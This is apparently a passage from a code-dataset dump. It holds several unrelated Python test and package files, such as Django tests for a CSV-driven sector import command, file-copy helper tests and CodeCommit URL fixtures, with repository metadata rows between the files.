        3,
        name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
    )
    parent_sector = SectorFactory()
    bucket = 'test_bucket'
    object_key = 'test_key'
    csv_content = f"""id,segment,sector_cluster_id,parent_id
{pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{pks[2]},{segments[2]},{clusters[2].pk},{parent_sector.pk}
"""
    s3_stubber.add_response(
        'get_object',
        {'Body': BytesIO(csv_content.encode(encoding='utf-8'))},
        expected_params={'Bucket': bucket, 'Key': object_key},
    )

    call_command('create_sector', bucket, object_key)

    sectors = Sector.objects.filter(pk__in=pks).order_by('pk')
    assert len(sectors) == 3
    # Every CSV row must have been created verbatim.
    for sector, pk, segment, cluster in zip(sectors, pks, segments, clusters):
        assert str(sector.pk) == pk
        assert sector.segment == segment
        assert sector.sector_cluster == cluster
        assert sector.parent == parent_sector
def test_duplicate_sector(s3_stubber, caplog):
    """Test that the command logs an error when the sector PK already exists."""
    caplog.set_level('ERROR')

    pks = [
        '00000000-0000-0000-0000-000000000001',
        '00000000-0000-0000-0000-000000000002',
        '00000000-0000-0000-0000-000000000003',
    ]
    segments = ['segment_1', 'segment_2', 'segment_3']
    clusters = SectorClusterFactory.create_batch(
        3,
        name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
    )
    parent_sector = SectorFactory()
    # Pre-create the third PK so the command hits a duplicate-key error.
    duplicate_sector = SectorFactory(id=pks[2])
    bucket = 'test_bucket'
    object_key = 'test_key'
    csv_content = f"""id,segment,sector_cluster_id,parent_id
{pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{duplicate_sector.pk},{segments[2]},{clusters[2].pk},{parent_sector.pk}
"""
    s3_stubber.add_response(
        'get_object',
        {'Body': BytesIO(csv_content.encode(encoding='utf-8'))},
        expected_params={'Bucket': bucket, 'Key': object_key},
    )

    call_command('create_sector', bucket, object_key)

    sectors = Sector.objects.filter(pk__in=pks).order_by('pk')
    assert len(sectors) == 3
    assert f'Key (id)=({duplicate_sector.pk}) already exists' in caplog.text
    assert len(caplog.records) == 1
    assert [str(s.pk) for s in sectors] == pks
    # Only the two non-conflicting rows were written by the command.
    for sector, segment, cluster in zip(sectors[:2], segments[:2], clusters[:2]):
        assert sector.segment == segment
        assert sector.sector_cluster == cluster
        assert sector.parent == parent_sector
def test_blank_parent(s3_stubber):
    """Test that the command creates the specified records when no parent is provided."""
    pks = [
        '00000000-0000-0000-0000-000000000001',
        '00000000-0000-0000-0000-000000000002',
        '00000000-0000-0000-0000-000000000003',
    ]
    segments = ['segment_1', 'segment_2', 'segment_3']
    clusters = SectorClusterFactory.create_batch(
        3,
        name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
    )
    parent_sector = SectorFactory()
    bucket = 'test_bucket'
    object_key = 'test_key'
    # Third row deliberately leaves parent_id empty.
    csv_content = f"""id,segment,sector_cluster_id,parent_id
{pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{pks[2]},{segments[2]},{clusters[2].pk},
"""
    s3_stubber.add_response(
        'get_object',
        {'Body': BytesIO(csv_content.encode(encoding='utf-8'))},
        expected_params={'Bucket': bucket, 'Key': object_key},
    )

    call_command('create_sector', bucket, object_key)

    sectors = Sector.objects.filter(pk__in=pks).order_by('pk')
    assert len(sectors) == 3
    expected_parents = [parent_sector, parent_sector, None]
    for sector, pk, segment, cluster, parent in zip(
        sectors, pks, segments, clusters, expected_parents,
    ):
        assert str(sector.pk) == pk
        assert sector.segment == segment
        assert sector.sector_cluster == cluster
        assert sector.parent == parent
def test_blank_sector_cluster(s3_stubber):
    """Test that the command creates the specified records when no sector cluster is provided."""
    pks = [
        '00000000-0000-0000-0000-000000000001',
        '00000000-0000-0000-0000-000000000002',
        '00000000-0000-0000-0000-000000000003',
    ]
    segments = ['segment_1', 'segment_2', 'segment_3']
    clusters = SectorClusterFactory.create_batch(
        3,
        name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
    )
    parent_sector = SectorFactory()
    bucket = 'test_bucket'
    object_key = 'test_key'
    # Third row deliberately leaves sector_cluster_id empty.
    csv_content = f"""id,segment,sector_cluster_id,parent_id
{pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{pks[2]},{segments[2]},,{parent_sector.pk}
"""
    s3_stubber.add_response(
        'get_object',
        {'Body': BytesIO(csv_content.encode(encoding='utf-8'))},
        expected_params={'Bucket': bucket, 'Key': object_key},
    )

    call_command('create_sector', bucket, object_key)

    sectors = Sector.objects.filter(pk__in=pks).order_by('pk')
    assert len(sectors) == 3
    for sector, pk, segment in zip(sectors, pks, segments):
        assert str(sector.pk) == pk
        assert sector.segment == segment
        assert sector.parent == parent_sector
    assert [s.sector_cluster for s in sectors[:2]] == clusters[:2]
    assert not sectors[2].sector_cluster
def test_non_existent_parent(s3_stubber, caplog):
    """Test that the command logs an error when parent PK does not exist."""
    caplog.set_level('ERROR')

    pks = [
        '00000000-0000-0000-0000-000000000001',
        '00000000-0000-0000-0000-000000000002',
        '00000000-0000-0000-0000-000000000003',
    ]
    segments = ['segment_1', 'segment_2', 'segment_3']
    clusters = SectorClusterFactory.create_batch(
        3,
        name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
    )
    parent_sector = SectorFactory()
    bucket = 'test_bucket'
    object_key = 'test_key'
    # Third row references a parent PK that is never created.
    csv_content = f"""id,segment,sector_cluster_id,parent_id
{pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{pks[2]},{segments[2]},{clusters[2].pk},00000000-0000-0000-0000-000000000000
"""
    s3_stubber.add_response(
        'get_object',
        {'Body': BytesIO(csv_content.encode(encoding='utf-8'))},
        expected_params={'Bucket': bucket, 'Key': object_key},
    )

    call_command('create_sector', bucket, object_key)

    sectors = Sector.objects.filter(pk__in=pks).order_by('pk')
    # Only the two valid rows were created; the bad one was logged.
    assert len(sectors) == 2
    assert 'Sector matching query does not exist' in caplog.text
    assert len(caplog.records) == 1
    for sector, pk, segment, cluster in zip(sectors, pks, segments, clusters):
        assert str(sector.pk) == pk
        assert sector.segment == segment
        assert sector.sector_cluster == cluster
        assert sector.parent == parent_sector
def test_non_existent_sector_cluster(s3_stubber, caplog):
    """Test that the command logs an error when sector cluster PK does not exist."""
    caplog.set_level('ERROR')

    pks = [
        '00000000-0000-0000-0000-000000000001',
        '00000000-0000-0000-0000-000000000002',
        '00000000-0000-0000-0000-000000000003',
    ]
    segments = ['segment_1', 'segment_2', 'segment_3']
    clusters = SectorClusterFactory.create_batch(
        3,
        name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
    )
    parent_sector = SectorFactory()
    bucket = 'test_bucket'
    object_key = 'test_key'
    # Third row references a sector cluster PK that is never created.
    csv_content = f"""id,segment,sector_cluster_id,parent_id
{pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{pks[2]},{segments[2]},00000000-0000-0000-0000-000000000000,{parent_sector.pk}
"""
    s3_stubber.add_response(
        'get_object',
        {'Body': BytesIO(csv_content.encode(encoding='utf-8'))},
        expected_params={'Bucket': bucket, 'Key': object_key},
    )

    call_command('create_sector', bucket, object_key)

    sectors = Sector.objects.filter(pk__in=pks).order_by('pk')
    # Only the two valid rows were created; the bad one was logged.
    assert len(sectors) == 2
    assert 'SectorCluster matching query does not exist' in caplog.text
    assert len(caplog.records) == 1
    for sector, pk, segment, cluster in zip(sectors, pks, segments, clusters):
        assert str(sector.pk) == pk
        assert sector.segment == segment
        assert sector.sector_cluster == cluster
        assert sector.parent == parent_sector
def test_simulate(s3_stubber):
    """Test that the command simulates creations if --simulate is passed in."""
    pks = [
        '00000000-0000-0000-0000-000000000001',
        '00000000-0000-0000-0000-000000000002',
        '00000000-0000-0000-0000-000000000003',
    ]
    segments = ['segment_1', 'segment_2', 'segment_3']
    clusters = SectorClusterFactory.create_batch(
        3,
        name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
    )
    parent_sector = SectorFactory()
    bucket = 'test_bucket'
    object_key = 'test_key'
    csv_content = f"""id,segment,sector_cluster_id,parent_id
{pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{pks[2]},{segments[2]},{clusters[2].pk},{parent_sector.pk}
"""
    s3_stubber.add_response(
        'get_object',
        {'Body': BytesIO(csv_content.encode(encoding='utf-8'))},
        expected_params={'Bucket': bucket, 'Key': object_key},
    )

    call_command('create_sector', bucket, object_key, simulate=True)

    # In simulate mode nothing may be persisted.
    assert not Sector.objects.filter(pk__in=pks).exists()
def test_audit_log(s3_stubber):
    """Test that reversion revisions are created."""
    pks = [
        '00000000-0000-0000-0000-000000000001',
        '00000000-0000-0000-0000-000000000002',
        '00000000-0000-0000-0000-000000000003',
    ]
    segments = ['segment_1', 'segment_2', 'segment_3']
    clusters = SectorClusterFactory.create_batch(
        3,
        name=factory.Iterator(['cluster_1', 'cluster_2', 'cluster_3']),
    )
    parent_sector = SectorFactory()
    bucket = 'test_bucket'
    object_key = 'test_key'
    csv_content = f"""id,segment,sector_cluster_id,parent_id
{pks[0]},{segments[0]},{clusters[0].pk},{parent_sector.pk}
{pks[1]},{segments[1]},{clusters[1].pk},{parent_sector.pk}
{pks[2]},{segments[2]},{clusters[2].pk},{parent_sector.pk}
"""
    s3_stubber.add_response(
        'get_object',
        {'Body': BytesIO(csv_content.encode(encoding='utf-8'))},
        expected_params={'Bucket': bucket, 'Key': object_key},
    )

    call_command('create_sector', bucket, object_key)

    sectors = Sector.objects.filter(pk__in=pks).order_by('pk')
    assert len(sectors) == 3
    # Each created sector gets exactly one reversion revision.
    for sector in sectors:
        versions = Version.objects.get_for_object(sector)
        assert versions.count() == 1
        assert versions[0].revision.get_comment() == 'Sector creation.'
| 32.925373 | 97 | 0.643472 | 1,647 | 13,236 | 4.958106 | 0.074074 | 0.050943 | 0.050943 | 0.063679 | 0.902768 | 0.89493 | 0.891624 | 0.891624 | 0.88893 | 0.88893 | 0 | 0.100672 | 0.201496 | 13,236 | 401 | 98 | 33.007481 | 0.671965 | 0.041251 | 0 | 0.756024 | 0 | 0.006024 | 0.304767 | 0.218673 | 0 | 0 | 0 | 0 | 0.123494 | 1 | 0.024096 | false | 0 | 0.021084 | 0 | 0.045181 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8eada9913902c9988f76b06d8259b0e686d48555 | 7,462 | py | Python | schevo/test/test_convert_format.py | Schevo/schevo | d57a41f8b7b514ed48dc0164dcd3412a89e9873b | [
"MIT"
] | 1 | 2020-09-05T00:47:50.000Z | 2020-09-05T00:47:50.000Z | schevo/test/test_convert_format.py | Schevo/schevo | d57a41f8b7b514ed48dc0164dcd3412a89e9873b | [
"MIT"
] | null | null | null | schevo/test/test_convert_format.py | Schevo/schevo | d57a41f8b7b514ed48dc0164dcd3412a89e9873b | [
"MIT"
] | null | null | null | """Database format conversion tests."""
# Copyright (c) 2001-2009 ElevenCraft Inc.
# See LICENSE for details.
from schevo.backend import backends
from schevo.placeholder import Placeholder
from schevo.test import CreatesSchema
# class TestFormat1Format2ConversionSimple(CreatesSchema):
# """Very simple test of the format 1 to format 2 converter."""
# format = 1
# body = '''
# class Foo(E.Entity):
# name = f.string()
# _key(name)
# _sample_unittest = [
# (u'Foo 1', ),
# (u'Foo 2', ),
# ]
# class Bar(E.Entity):
# id = f.integer()
# foo = f.entity('Foo')
# _key(id)
# _index(foo)
# _sample_unittest = [
# (1, (u'Foo 1', ), ),
# (2, (u'Foo 2', ), ),
# (3, (u'Foo 1', ), ),
# (4, (u'Foo 2', ), ),
# ]
# '''
# def test(self):
# self.internal_structure_format_1(db)
# self.reopen(format=2)
# self.internal_structure_format_2(db)
# def internal_structure_format_1(self, db):
# schevo = db._root['SCHEVO']
# assert schevo['format'] == 1
# extent_name_id = schevo['extent_name_id']
# extents = schevo['extents']
# Foo_extent_id = extent_name_id['Foo']
# Bar_extent_id = extent_name_id['Bar']
# Foo_extent = extents[Foo_extent_id]
# Bar_extent = extents[Bar_extent_id]
# Foo_field_name_id = Foo_extent['field_name_id']
# Bar_field_name_id = Bar_extent['field_name_id']
# Foo_name_field_id = Foo_field_name_id['name']
# Bar_id_field_id = Bar_field_name_id['id']
# Bar_foo_field_id = Bar_field_name_id['foo']
# Foo_entities = Foo_extent['entities']
# Bar_entities = Bar_extent['entities']
# Foo_1 = Foo_entities[1]
# Foo_2 = Foo_entities[2]
# Bar_1 = Bar_entities[1]
# Bar_2 = Bar_entities[2]
# Bar_3 = Bar_entities[3]
# Bar_4 = Bar_entities[4]
# assert Foo_1['fields'][Foo_name_field_id] == u'Foo 1'
# assert Foo_2['fields'][Foo_name_field_id] == u'Foo 2'
# assert Bar_1['fields'][Bar_id_field_id] == 1
# assert Bar_2['fields'][Bar_id_field_id] == 2
# assert Bar_3['fields'][Bar_id_field_id] == 3
# assert Bar_4['fields'][Bar_id_field_id] == 4
# assert Bar_1['fields'][Bar_foo_field_id] == (Foo_extent_id, 1)
# assert Bar_2['fields'][Bar_foo_field_id] == (Foo_extent_id, 2)
# assert Bar_3['fields'][Bar_foo_field_id] == (Foo_extent_id, 1)
# assert Bar_4['fields'][Bar_foo_field_id] == (Foo_extent_id, 2)
# Bar_foo_index_unique, Bar_foo_index_tree = Bar_extent['indices'][
# (Bar_foo_field_id, )]
# assert set(Bar_foo_index_tree.keys()) == set([
# (Foo_extent_id, 1),
# (Foo_extent_id, 2),
# ])
# assert set(Bar_foo_index_tree[(Foo_extent_id, 1)].keys()) == set([1, 3])
# assert set(Bar_foo_index_tree[(Foo_extent_id, 2)].keys()) == set([2, 4])
# def internal_structure_format_2(self, db):
# schevo = db._root['SCHEVO']
# assert schevo['format'] == 2
# extent_name_id = schevo['extent_name_id']
# extents = schevo['extents']
# Foo_extent_id = extent_name_id['Foo']
# Bar_extent_id = extent_name_id['Bar']
# Foo_extent = extents[Foo_extent_id]
# Bar_extent = extents[Bar_extent_id]
# Foo_field_name_id = Foo_extent['field_name_id']
# Bar_field_name_id = Bar_extent['field_name_id']
# Foo_name_field_id = Foo_field_name_id['name']
# Bar_id_field_id = Bar_field_name_id['id']
# Bar_foo_field_id = Bar_field_name_id['foo']
# Foo_entities = Foo_extent['entities']
# Bar_entities = Bar_extent['entities']
# Foo_1 = Foo_entities[1]
# Foo_2 = Foo_entities[2]
# Bar_1 = Bar_entities[1]
# Bar_2 = Bar_entities[2]
# Bar_3 = Bar_entities[3]
# Bar_4 = Bar_entities[4]
# assert Foo_1['fields'][Foo_name_field_id] == u'Foo 1'
# assert Foo_2['fields'][Foo_name_field_id] == u'Foo 2'
# assert Bar_1['fields'][Bar_id_field_id] == 1
# assert Bar_2['fields'][Bar_id_field_id] == 2
# assert Bar_3['fields'][Bar_id_field_id] == 3
# assert Bar_4['fields'][Bar_id_field_id] == 4
# assert Bar_1['fields'][Bar_foo_field_id] == Placeholder(db.Foo[1])
# assert Bar_2['fields'][Bar_foo_field_id] == Placeholder(db.Foo[2])
# assert Bar_3['fields'][Bar_foo_field_id] == Placeholder(db.Foo[1])
# assert Bar_4['fields'][Bar_foo_field_id] == Placeholder(db.Foo[2])
# assert Bar_1['related_entities'][Bar_foo_field_id] == frozenset([
# Placeholder(db.Foo[1])])
# assert Bar_2['related_entities'][Bar_foo_field_id] == frozenset([
# Placeholder(db.Foo[2])])
# assert Bar_3['related_entities'][Bar_foo_field_id] == frozenset([
# Placeholder(db.Foo[1])])
# assert Bar_4['related_entities'][Bar_foo_field_id] == frozenset([
# Placeholder(db.Foo[2])])
# Bar_foo_index_unique, Bar_foo_index_tree = Bar_extent['indices'][
# (Bar_foo_field_id, )]
# assert set(Bar_foo_index_tree.keys()) == set([
# Placeholder(db.Foo[1]),
# Placeholder(db.Foo[2]),
# ])
# assert set(Bar_foo_index_tree[Placeholder(db.Foo[1])].keys()) == set(
# [1, 3])
# assert set(Bar_foo_index_tree[Placeholder(db.Foo[2])].keys()) == set(
# [2, 4])
# class TestFormat1Format2ConversionComplex(CreatesSchema):
# """More complex test of the format 1 to format 2 converter."""
# format = 1
# body = '''
# class Foo(E.Entity):
# name = f.string()
# _key(name)
# _sample_unittest = [
# (u'Foo 1', ),
# (u'Foo 2', ),
# ]
# class Gee(E.Entity):
# name = f.string()
# _key(name)
# _sample_unittest = [
# (u'Gee 1', ),
# (u'Gee 2', ),
# ]
# class Bar(E.Entity):
# id = f.integer()
# foo = f.entity('Foo')
# gee = f.entity('Gee')
# _key(id)
# _index(foo, gee)
# _sample_unittest = [
# (1, (u'Foo 1', ), (u'Gee 1', ), ),
# (2, (u'Foo 2', ), (u'Gee 1', ), ),
# (3, (u'Foo 1', ), (u'Gee 1', ), ),
# (4, (u'Foo 2', ), (u'Gee 2', ), ),
# ]
# '''
# def test(self):
# self.check_using_public_api()
# self.reopen(format=2)
# self.check_using_public_api()
# def check_using_public_api(self):
# foo1 = db.Foo[1]
# foo2 = db.Foo[2]
# gee1 = db.Gee[1]
# gee2 = db.Gee[2]
# bar1 = db.Bar[1]
# bar2 = db.Bar[2]
# bar3 = db.Bar[3]
# bar4 = db.Bar[4]
# assert bar1.foo == foo1
# assert bar1.gee == gee1
# assert bar2.foo == foo2
# assert bar2.gee == gee1
# assert bar3.foo == foo1
# assert bar3.gee == gee1
# assert bar4.foo == foo2
# assert bar4.gee == gee2
| 35.703349 | 82 | 0.534709 | 961 | 7,462 | 3.816857 | 0.08845 | 0.061069 | 0.047983 | 0.056707 | 0.802345 | 0.74373 | 0.728735 | 0.724918 | 0.724918 | 0.65349 | 0 | 0.0336 | 0.313991 | 7,462 | 208 | 83 | 35.875 | 0.682946 | 0.933262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
d94bae8109474f21f459aa31bb68ed0bd60cb18f | 158 | py | Python | uncertainty_eval/metrics/__init__.py | selflein/nn_uncertainty_eval | 94a7f2292b8db2197cd55fab57324d438618ae06 | [
"Apache-2.0"
] | 1 | 2022-02-10T16:59:47.000Z | 2022-02-10T16:59:47.000Z | uncertainty_eval/metrics/__init__.py | selflein/nn_uncertainty_eval | 94a7f2292b8db2197cd55fab57324d438618ae06 | [
"Apache-2.0"
] | null | null | null | uncertainty_eval/metrics/__init__.py | selflein/nn_uncertainty_eval | 94a7f2292b8db2197cd55fab57324d438618ae06 | [
"Apache-2.0"
] | null | null | null | from uncertainty_eval.metrics.brier import brier_decomposition, brier_score
from uncertainty_eval.metrics.calibration_error import classification_calibration
| 52.666667 | 81 | 0.911392 | 19 | 158 | 7.263158 | 0.578947 | 0.217391 | 0.275362 | 0.376812 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056962 | 158 | 2 | 82 | 79 | 0.926175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
d94f12fc90ad23c3136b0a878ae4adf6cd9adc80 | 2,780 | py | Python | scripting/tests/test_cp.py | csdms/py-scripting | df8ba070e44a9d8e6ffcb70958f851e6776e2853 | [
"MIT"
] | null | null | null | scripting/tests/test_cp.py | csdms/py-scripting | df8ba070e44a9d8e6ffcb70958f851e6776e2853 | [
"MIT"
] | null | null | null | scripting/tests/test_cp.py | csdms/py-scripting | df8ba070e44a9d8e6ffcb70958f851e6776e2853 | [
"MIT"
] | null | null | null | import os
from scripting import cp
def test_cp(tmpdir):
    """cp copies a relative file into a new directory, creating it."""
    tmpdir.mkdir("src").join("hello.txt").write("hello!")
    src = os.path.join("src", "hello.txt")
    dest = os.path.join("dest", "hi.txt")
    with tmpdir.as_cwd():
        cp(src, dest, create_dirs=True)
        with open(dest, "r") as fp:
            assert fp.read() == "hello!"
def test_cp_to_dot(tmpdir):
    """cp accepts an explicit './' prefix on the destination path."""
    tmpdir.mkdir("src").join("hello.txt").write("hello!")
    src = os.path.join("src", "hello.txt")
    dest = os.path.join(".", "hi.txt")
    with tmpdir.as_cwd():
        cp(src, dest, create_dirs=True)
        with open(dest, "r") as fp:
            assert fp.read() == "hello!"
def test_cp_from_dot(tmpdir):
    """cp accepts an explicit './' prefix on the source path."""
    tmpdir.join("hello.txt").write("hello!")
    src = os.path.join(".", "hello.txt")
    dest = os.path.join("dest", "hi.txt")
    with tmpdir.as_cwd():
        cp(src, dest, create_dirs=True)
        with open(dest, "r") as fp:
            assert fp.read() == "hello!"
def test_cp_to_cwd(tmpdir):
    """cp accepts a bare filename (current directory) as destination."""
    tmpdir.mkdir("src").join("hello.txt").write("hello!")
    src = os.path.join("src", "hello.txt")
    dest = "hi.txt"
    with tmpdir.as_cwd():
        cp(src, dest, create_dirs=True)
        with open(dest, "r") as fp:
            assert fp.read() == "hello!"
def test_cp_from_cwd(tmpdir):
    """cp accepts a bare filename (current directory) as source."""
    tmpdir.join("hello.txt").write("hello!")
    src = "hello.txt"
    dest = os.path.join("dest", "hi.txt")
    with tmpdir.as_cwd():
        cp(src, dest, create_dirs=True)
        with open(dest, "r") as fp:
            assert fp.read() == "hello!"
def test_cp_from_abspath(tmpdir):
    """cp accepts an absolute source path."""
    tmpdir.join("hello.txt").write("hello!")
    with tmpdir.as_cwd():
        src = os.path.abspath("hello.txt")
        dest = os.path.join("dest", "hi.txt")
        cp(src, dest, create_dirs=True)
        with open(dest, "r") as fp:
            assert fp.read() == "hello!"
def test_cp_to_abspath(tmpdir):
    """cp accepts an absolute destination path."""
    tmpdir.join("hello.txt").write("hello!")
    with tmpdir.as_cwd():
        src = "hello.txt"
        dest = os.path.abspath(os.path.join("dest", "hi.txt"))
        cp(src, dest, create_dirs=True)
        with open(dest, "r") as fp:
            assert fp.read() == "hello!"
def test_cp_with_folders(tmpdir):
    """cp creates nested destination directories as needed."""
    tmpdir.mkdir("sub").join("hello.txt").write("hello!")
    src = os.path.join("sub", "hello.txt")
    dest = os.path.join("dest", "sub", "hi.txt")
    with tmpdir.as_cwd():
        cp(src, dest, create_dirs=True)
        with open(dest, "r") as fp:
            assert fp.read() == "hello!"
| 23.965517 | 62 | 0.56223 | 401 | 2,780 | 3.802993 | 0.087282 | 0.083934 | 0.078689 | 0.068197 | 0.92918 | 0.92918 | 0.917377 | 0.900328 | 0.900328 | 0.892459 | 0 | 0 | 0.257554 | 2,780 | 115 | 63 | 24.173913 | 0.738857 | 0 | 0 | 0.780488 | 0 | 0 | 0.12554 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 1 | 0.097561 | false | 0 | 0.02439 | 0 | 0.121951 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d955702b3c600270d7d1f124d033dffec2f4843b | 2,788 | py | Python | tests/__init__.py | Nr18/pull-request-codecommit | e4015a57620b75b7aedecb6d924ffc7883ba8de3 | [
"MIT"
] | null | null | null | tests/__init__.py | Nr18/pull-request-codecommit | e4015a57620b75b7aedecb6d924ffc7883ba8de3 | [
"MIT"
] | 64 | 2022-01-21T20:05:50.000Z | 2022-03-31T03:36:05.000Z | tests/__init__.py | Nr18/pull-request-codecommit | e4015a57620b75b7aedecb6d924ffc7883ba8de3 | [
"MIT"
] | null | null | null | COMMIT2 = """commit my-hash-1
Author: John Doe <john@doe.nl>
Date: Fri Jan 21 21:01:00 2022 +0100
feat: my first commit"""
COMMIT1 = """commit my-hash-2
Author: John Doe <john@doe.nl>
Date: Fri Jan 21 21:01:00 2022 +0100
feat: my second commit"""
COMMITS = f"{COMMIT1}\n\n Issue #1\n\n{COMMIT2}\n\n Issue #2"
COMMITS_NO_ISSUES = f"{COMMIT1}\n\n{COMMIT2}"
SCENARIOS = [
(
"codecommit::eu-west-1://my-profile@my-repository",
"eu-west-1",
"my-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit::eu-west-1://my-profile@my-repository",
"eu-central-1",
"my-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS_NO_ISSUES,
),
(
"codecommit::eu-west-1://my-profile@my-repository",
"eu-west-1",
"my-other-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS_NO_ISSUES,
),
(
"codecommit::eu-west-1://my-profile@my-repository",
"eu-central-1",
"my-other-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit::eu-west-1://my-repository",
"eu-central-1",
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit::://my-profile@my-repository",
None,
"my-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit::://my-repository",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-profile@my-repository",
None,
"my-profile",
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-repository",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-repository-pr-failure",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-repository-open-pr",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-repository-other-open-pr",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
]
| 27.333333 | 79 | 0.549857 | 343 | 2,788 | 4.451895 | 0.131195 | 0.141454 | 0.117878 | 0.133595 | 0.896529 | 0.883432 | 0.883432 | 0.883432 | 0.883432 | 0.883432 | 0 | 0.025781 | 0.276542 | 2,788 | 101 | 80 | 27.60396 | 0.731284 | 0 | 0 | 0.708333 | 0 | 0.135417 | 0.610832 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d989285ef8f7b7e31e1dd821affdbc92795a8d83 | 197 | py | Python | toolsql/sqlalchemy_utils/__init__.py | sslivkoff/toolsql | 7f41c3ee1b4e5a67732244ce54893fca746aa9e7 | [
"MIT"
] | null | null | null | toolsql/sqlalchemy_utils/__init__.py | sslivkoff/toolsql | 7f41c3ee1b4e5a67732244ce54893fca746aa9e7 | [
"MIT"
] | null | null | null | toolsql/sqlalchemy_utils/__init__.py | sslivkoff/toolsql | 7f41c3ee1b4e5a67732244ce54893fca746aa9e7 | [
"MIT"
] | null | null | null |
from .column_utils import *
from .conn_utils import *
from .engine_utils import *
from .metadata_utils import *
from .row_utils import *
from .statement_utils import *
from .table_utils import *
| 19.7 | 30 | 0.77665 | 28 | 197 | 5.214286 | 0.357143 | 0.527397 | 0.616438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152284 | 197 | 9 | 31 | 21.888889 | 0.874252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7965f9a944b0115e3c008ff64f1daddc08cda9d8 | 32 | py | Python | try6.py | aka-bla/sh1904work | 5d3842a4bb2fbedbdfc56c2f03af3629540c8fe4 | [
"Apache-2.0"
